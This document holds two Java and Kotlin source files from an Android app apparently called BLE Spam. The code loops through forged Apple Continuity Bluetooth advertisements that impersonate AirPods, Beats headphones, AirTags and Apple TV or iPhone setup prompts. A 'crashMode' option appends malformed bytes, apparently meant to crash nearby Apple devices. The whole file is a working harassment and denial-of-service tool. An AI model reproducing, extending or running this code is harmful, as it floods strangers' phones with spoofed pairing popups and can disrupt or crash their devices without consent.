File: app/src/main/java/com/tutozz/blespam/ContinuitySpam.java
package com.tutozz.blespam;

import android.bluetooth.le.AdvertiseData;

import java.util.Random;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;

public class ContinuitySpam implements Spammer {
    public Runnable blinkRunnable;
    public ContinuityDevice[] devices;
    private int loop = 0;
    public boolean isSpamming = false;
    public boolean crashMode;
    ExecutorService executor = Executors.newSingleThreadExecutor();

    // AirTag-specific data
    private static final String[] AIRTAG_DEVICE_IDS = {"0055", "0030"};
    private static final String[] AIRTAG_DEVICE_NAMES = {"Airtag", "Hermes Airtag"};
    private static final String COLOR_KEY = "00"; // White color for AirTags
    private static final int AIRTAG_PAYLOAD_SIZE = 25; // 0x19
    private static final String AIRTAG_STATUS = "55";

    public ContinuitySpam(ContinuityDevice.type type, boolean crashMode) {
        this.crashMode = crashMode;
        // Init ContinuityDevices
        switch (type) {
            default:
            case DEVICE:
                devices = new ContinuityDevice[]{
                        new ContinuityDevice("0x0E20", "Custom AirPods Pro 1", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x1420", "Custom AirPods Pro 2", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x1420", "Custom AirPods Pro 3", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x0E20", "Custom AirPods Pro 4", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x0E20", "AirPods Pro", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x0620", "Beats Solo 3", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x0A20", "AirPods Max", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x1020", "Beats Flex", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x0055", "Airtag", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x0030", "Hermes Airtag", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x0220", "AirPods", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x0F20", "AirPods 2nd Gen", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x1320", "AirPods 3rd Gen", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x1420", "AirPods Pro 2nd Gen", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x0320", "Powerbeats 3", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x0B20", "Powerbeats Pro", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x0C20", "Beats Solo Pro", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x1120", "Beats Studio Buds", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x0520", "Beats X", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x0920", "Beats Studio 3", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x1720", "Beats Studio Pro", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x1220", "Beats Fit Pro", ContinuityDevice.type.DEVICE),
                        new ContinuityDevice("0x1620", "Beats Studio Buds+", ContinuityDevice.type.DEVICE)
                };
                break;
            case ACTION:
                devices = new ContinuityDevice[]{
                        new ContinuityDevice("0x13", "AppleTV AutoFill", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x27", "AppleTV Connecting...", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x20", "Join This AppleTV?", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x19", "AppleTV Audio Sync", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x1E", "AppleTV Color Balance", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x09", "Setup New iPhone", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x02", "Transfer Phone Number", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x0B", "HomePod Setup", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x01", "Setup New AppleTV", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x06", "Pair AppleTV", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x0D", "HomeKit AppleTV Setup", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x2B", "AppleID for AppleTV?", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x05", "Apple Watch", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x24", "Apple Vision Pro", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x2F", "Connect to other Device", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x21", "Software Update", ContinuityDevice.type.ACTION),
                        new ContinuityDevice("0x2E", "Unlock with Apple Watch", ContinuityDevice.type.ACTION)
                };
                break;
        }
    }

    private String getRandomBudsBatteryLevel() {
        int level = ((new Random().nextInt(10) << 4) + new Random().nextInt(10));
        return String.format("%02X", level);
    }

    private String getRandomChargingCaseBatteryLevel() {
        int level = ((new Random().nextInt(8) % 8) << 4) + (new Random().nextInt(10) % 10);
        return String.format("%02X", level);
    }

    private String getRandomLidOpenCounter() {
        return String.format("%02X", new Random().nextInt(256));
    }

    private String getRandomBytes(int length) {
        byte[] bytes = new byte[length];
        new Random().nextBytes(bytes);
        StringBuilder hex = new StringBuilder();
        for (byte b : bytes) {
            hex.append(String.format("%02X", b & 0xFF));
        }
        return hex.toString();
    }

    public void start() {
        executor.execute(() -> {
            BluetoothAdvertiser b = new BluetoothAdvertiser();
            isSpamming = true;
            for (loop = 0; loop <= Helper.MAX_LOOP; loop++) {
                if (isSpamming) {
                    // Random device
                    ContinuityDevice device = devices[new Random().nextInt(devices.length)];
                    AdvertiseData data = null;

                    if (device.getDeviceType() == ContinuityDevice.type.ACTION) {
                        String rHex = Helper.randomHexFiller(6);
                        String manufacturerData = "0F05C0" + device.getValue() + rHex;
                        if (crashMode) {
                            manufacturerData = "0F05C0" + device.getValue() + rHex + "000010" + rHex;
                        }
                        data = new AdvertiseData.Builder()
                                .addManufacturerData(0x004C, Helper.convertHexToByteArray(manufacturerData))
                                .build();
                    } else if (device.getDeviceType() == ContinuityDevice.type.DEVICE) {
                        String manufacturerData;
                        if (device.getName().equals("Custom AirPods Pro 1")) {
                            manufacturerData = "070F000E204142FD2C9A5B956464640400";
                        } else if (device.getName().equals("Custom AirPods Pro 2")) {
                            manufacturerData = "071301142075AA3733001000E4E407000000000000";
                        } else if (device.getName().equals("Custom AirPods Pro 3")) {
                            manufacturerData = "070F001420CC97AB7DD9BE95E4E4100500";
                        } else if (device.getName().equals("Custom AirPods Pro 4")) {
                            manufacturerData = "0719010E2071AA37370010D760E0789CF7D3DD4C8018F728B31C49";
                        } else if (device.getName().equals("Airtag") || device.getName().equals("Hermes Airtag")) {
                            // Improved AirTag logic
                            String continuityType = "07"; // ProximityPair
                            String payloadSize = "19"; // 25 bytes
                            String prefix = "05"; // New AirTag
                            String deviceId = device.getName().equals("Airtag") ? "0055" : "0030";
                            manufacturerData = continuityType +
                                    payloadSize +
                                    prefix +
                                    deviceId +
                                    AIRTAG_STATUS +
                                    getRandomBudsBatteryLevel() +
                                    getRandomChargingCaseBatteryLevel() +
                                    getRandomLidOpenCounter() +
                                    COLOR_KEY +
                                    "00" +
                                    getRandomBytes(16);
                        } else {
                            // Original logic for other devices
                            String continuityType = "07";
                            String size = "19";
                            String prefix = "01";
                            if (device.getName().equals("Airtag")) prefix = "05"; // Fallback, not used
                            String budsBatteryLevel = String.format("%02X", new Random().nextInt(10) * 10 + new Random().nextInt(10));
                            String caseBatteryLevel = String.format("%02X", new Random().nextInt(8) * 10 + new Random().nextInt(10));
                            String lidOpenCounter = String.format("%02X", new Random().nextInt(256));
                            String filler = Helper.randomHexFiller(32);
                            manufacturerData = continuityType + size + prefix + device.getValue() + "55" + budsBatteryLevel + caseBatteryLevel + lidOpenCounter + "0000" + filler;
                        }
                        data = new AdvertiseData.Builder()
                                .addManufacturerData(0x004C, Helper.convertHexToByteArray(manufacturerData))
                                .build();
                    }
                    // Advertise
                    b.advertise(data, null);
                    // Wait before next advertise
                    try {
                        System.out.println(Helper.delay);
                        Thread.sleep(Helper.delay);
                    } catch (InterruptedException e) {
                        e.printStackTrace();
                    }
                    // Stop this advertise to start the next one
                    b.stopAdvertising();
                }
            }
        });
    }

    public boolean isSpamming() {
        return isSpamming;
    }

    public void stop() {
        loop = Helper.MAX_LOOP + 1;
        isSpamming = false;
    }

    public Runnable getBlinkRunnable() {
        return blinkRunnable;
    }

    public void setBlinkRunnable(Runnable blinkRunnable) {
        this.blinkRunnable = blinkRunnable;
    }
}

File: app/src/main/java/com/tutozz/blespam/ContinuitySpam.kt
package com.tutozz.blespam

import android.bluetooth.le.AdvertiseData
import android.os.Build
import java.util.HashMap
import java.util.Random
import java.util.concurrent.ExecutorService
import java.util.concurrent.Executors

class ContinuitySpam(private val type: ContinuityType, var crashMode: Boolean = false) : Spammer {

    private var _blinkRunnable: Runnable? = null
    private var blinkRunnable: Runnable? = null

    private var _isSpamming = false

    lateinit var devices: Array<ContinuityDevice>

    private val executor: ExecutorService = Executors.newSingleThreadExecutor()
    private val rand = Random()

    companion object {
        private const val COLOR_KEY_DEFAULT = "00"
        private const val CONTINUITY_TYPE = "07"
        private const val PAYLOAD_SIZE = "19"
        private const val STATUS = "55"

        private val DEVICE_COLORS = HashMap<String, Array<String>>().apply {
            put("0E20", arrayOf("00"))
            put("0220", arrayOf("00"))
            put("0F20", arrayOf("00"))
            put("1320", arrayOf("00"))
            put("1420", arrayOf("00"))
            put("0A20", arrayOf("00", "02", "03", "0F", "11"))
            put("1020", arrayOf("00", "01"))
            put("0620", arrayOf("00", "01", "06", "07", "08", "09", "0E", "0F"))
            put("0320", arrayOf("00", "01", "0B", "0C", "0D"))
            put("0B20", arrayOf("00", "02", "03", "04", "05", "06"))
            put("0C20", arrayOf("00", "01"))
            put("1120", arrayOf("00", "01", "02", "03", "04"))
            put("0520", arrayOf("00", "01", "02", "05"))
            put("0920", arrayOf("00", "01", "02", "03"))
            put("1720", arrayOf("00", "01"))
            put("1220", arrayOf("00", "01", "02", "03", "04"))
            put("1620", arrayOf("00", "01", "02", "03"))
            put("0055", arrayOf("00"))
            put("0030", arrayOf("00"))
        }

        private val DEVICE_DATA = HashMap<String, String>().apply {
            put("0E20", "AirPods Pro")
            put("0A20", "AirPods Max")
            put("0220", "AirPods")
            put("0F20", "AirPods 2nd Gen")
            put("1320", "AirPods 3rd Gen")
            put("1420", "AirPods Pro 2nd Gen")
            put("1020", "Beats Flex")
            put("0620", "Beats Solo 3")
            put("0320", "Powerbeats 3")
            put("0B20", "Powerbeats Pro")
            put("0C20", "Beats Solo Pro")
            put("1120", "Beats Studio Buds")
            put("0520", "Beats X")
            put("0920", "Beats Studio 3")
            put("1720", "Beats Studio Pro")
            put("1220", "Beats Fit Pro")
            put("1620", "Beats Studio Buds+")
        }
    }

    init {
        devices = when (type) {
            ContinuityType.DEVICE -> arrayOf(
                ContinuityDevice("0x0E20", "AirPods Pro 2 GEN", ContinuityType.DEVICE),
                ContinuityDevice("0x1420", "AirPods Pro 1 GEN", ContinuityType.DEVICE),
                ContinuityDevice("0x0E20", "AirPods Pro", ContinuityType.DEVICE),
                ContinuityDevice("0x0620", "Beats Solo 3", ContinuityType.DEVICE),
                ContinuityDevice("0x0A20", "AirPods Max", ContinuityType.DEVICE),
                ContinuityDevice("0x1020", "Beats Flex", ContinuityType.DEVICE),
                ContinuityDevice("0x0055", "Airtag", ContinuityType.DEVICE),
                ContinuityDevice("0x0030", "Hermes Airtag", ContinuityType.DEVICE),
                ContinuityDevice("0x0220", "AirPods", ContinuityType.DEVICE),
                ContinuityDevice("0x0F20", "AirPods 2nd Gen", ContinuityType.DEVICE),
                ContinuityDevice("0x1320", "AirPods 3rd Gen", ContinuityType.DEVICE),
                ContinuityDevice("0x1420", "AirPods Pro 2nd Gen", ContinuityType.DEVICE),
                ContinuityDevice("0x0320", "Powerbeats 3", ContinuityType.DEVICE),
                ContinuityDevice("0x0B20", "Powerbeats Pro", ContinuityType.DEVICE),
                ContinuityDevice("0x0C20", "Beats Solo Pro", ContinuityType.DEVICE),
                ContinuityDevice("0x1120", "Beats Studio Buds", ContinuityType.DEVICE),
                ContinuityDevice("0x0520", "Beats X", ContinuityType.DEVICE),
                ContinuityDevice("0x0920", "Beats Studio 3", ContinuityType.DEVICE),
                ContinuityDevice("0x1720", "Beats Studio Pro", ContinuityType.DEVICE),
                ContinuityDevice("0x1220", "Beats Fit Pro", ContinuityType.DEVICE),
                ContinuityDevice("0x1620", "Beats Studio Buds+", ContinuityType.DEVICE)
            )
            ContinuityType.NOTYOURDEVICE -> if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.N) {
                DEVICE_DATA.map { (key, value) ->
                    ContinuityDevice("0x$key", "$value (NOT YOUR)", ContinuityType.NOTYOURDEVICE)
                }.toTypedArray()
            } else {
                emptyArray()
            }
            ContinuityType.ACTION -> arrayOf(
                ContinuityDevice("0x13", "AppleTV AutoFill", ContinuityType.ACTION),
                ContinuityDevice("0x27", "AppleTV Connecting...", ContinuityType.ACTION),
                ContinuityDevice("0x20", "Join This AppleTV?", ContinuityType.ACTION),
                ContinuityDevice("0x19", "AppleTV Audio Sync", ContinuityType.ACTION),
                ContinuityDevice("0x1E", "AppleTV Color Balance", ContinuityType.ACTION),
                ContinuityDevice("0x09", "Setup New iPhone", ContinuityType.ACTION),
                ContinuityDevice("0x02", "Transfer Phone Number", ContinuityType.ACTION),
                ContinuityDevice("0x0B", "HomePod Setup", ContinuityType.ACTION),
                ContinuityDevice("0x01", "Setup New AppleTV", ContinuityType.ACTION),
                ContinuityDevice("0x06", "Pair AppleTV", ContinuityType.ACTION),
                ContinuityDevice("0x0D", "HomeKit AppleTV Setup", ContinuityType.ACTION),
                ContinuityDevice("0x2B", "AppleID for AppleTV?", ContinuityType.ACTION),
                ContinuityDevice("0x05", "Apple Watch", ContinuityType.ACTION),
                ContinuityDevice("0x24", "Apple Vision Pro", ContinuityType.ACTION),
                ContinuityDevice("0x2F", "Connect to other Device", ContinuityType.ACTION),
                ContinuityDevice("0x21", "Software Update", ContinuityType.ACTION),
                ContinuityDevice("0x2E", "Unlock with Apple Watch", ContinuityType.ACTION)
            )
            else -> emptyArray()
        }
    }

    private fun toHexByte(b: Int): String = String.format("%02X", b and 0xFF)

    private fun getRandomBudsBatteryLevelHex(): String {
        val level = ((rand.nextInt(10) shl 4) + rand.nextInt(10)) and 0xFF
        return toHexByte(level)
    }

    private fun getRandomChargingCaseBatteryLevelHex(): String {
        val level = (((rand.nextInt(8) % 8) shl 4) + (rand.nextInt(10) % 10)) and 0xFF
        return toHexByte(level)
    }

    private fun getRandomLidOpenCounterHex(): String {
        val counter = rand.nextInt(256)
        return toHexByte(counter)
    }

    private fun getRandomHexBytes(length: Int): String {
        val bytes = ByteArray(length)
        rand.nextBytes(bytes)
        return bytes.joinToString("") { String.format("%02X", it.toInt() and 0xFF) }
    }

    private fun pickRandomColorForDevice(deviceIdNoPrefix: String): String {
        return DEVICE_COLORS[deviceIdNoPrefix]?.randomOrNull() ?: COLOR_KEY_DEFAULT
    }

    private fun buildContinuityPayload(prefixHex: String, deviceIdHex: String, colorHex: String?): String {
        val buds = getRandomBudsBatteryLevelHex()
        val charging = getRandomChargingCaseBatteryLevelHex()
        val lid = getRandomLidOpenCounterHex()
        val color = colorHex ?: COLOR_KEY_DEFAULT

        return buildString {
            append(CONTINUITY_TYPE)
            append(PAYLOAD_SIZE)
            append(prefixHex)
            append(deviceIdHex)
            append(STATUS)
            append(buds)
            append(charging)
            append(lid)
            append(color)
            append("00")
            append(getRandomHexBytes(16))
        }
    }

    override fun start() {
        executor.execute @androidx.annotation.RequiresPermission(android.Manifest.permission.BLUETOOTH_ADVERTISE) {
            val bluetoothAdvertiser = BluetoothAdvertiser()
            _isSpamming = true
            for (i in 0..Helper.MAX_LOOP) {
                if (!_isSpamming) break

                val device = devices.random()
                var data: AdvertiseData? = null

                when (device.deviceType) {
                    ContinuityType.ACTION -> {
                        val rHex = Helper.randomHexFiller(6)
                        var manufacturerData = "0F05C0${device.value.removePrefix("0x").uppercase()}$rHex"
                        if (crashMode) {
                            manufacturerData += "000010$rHex"
                        }
                        data = AdvertiseData.Builder()
                            .addManufacturerData(0x004C, Helper.convertHexToByteArray(manufacturerData))
                            .build()
                    }
                    ContinuityType.NOTYOURDEVICE -> {
                        val deviceVal = device.value.removePrefix("0x").uppercase()
                        val color = pickRandomColorForDevice(deviceVal)
                        val manufacturerData = buildContinuityPayload("01", deviceVal, color)
                        data = AdvertiseData.Builder()
                            .addManufacturerData(0x004C, Helper.convertHexToByteArray(manufacturerData))
                            .build()
                    }
                    ContinuityType.DEVICE -> {
                        val deviceVal = device.value.removePrefix("0x").uppercase()
                        val manufacturerData = buildContinuityPayload("07", deviceVal, pickRandomColorForDevice(deviceVal))
                        data = AdvertiseData.Builder()
                            .addManufacturerData(0x004C, Helper.convertHexToByteArray(manufacturerData))
                            .build()
                    }
                    else -> {
                    }
                }

                data?.let { bluetoothAdvertiser.advertise(it, null) }

                try {
                    Thread.sleep(Helper.delay.toLong())
                } catch (e: InterruptedException) {
                    Thread.currentThread().interrupt()
                    return@execute
                }

                bluetoothAdvertiser.stopAdvertising()
            }
            _isSpamming = false
        }
    }

    override fun isSpamming(): Boolean = _isSpamming

    override fun stop() {
        _isSpamming = false
    }

    override fun setBlinkRunnable(blinkRunnable: Runnable?) {
        this.blinkRunnable = blinkRunnable
    }

    override fun getBlinkRunnable(): Runnable? {
        return blinkRunnable
    }
}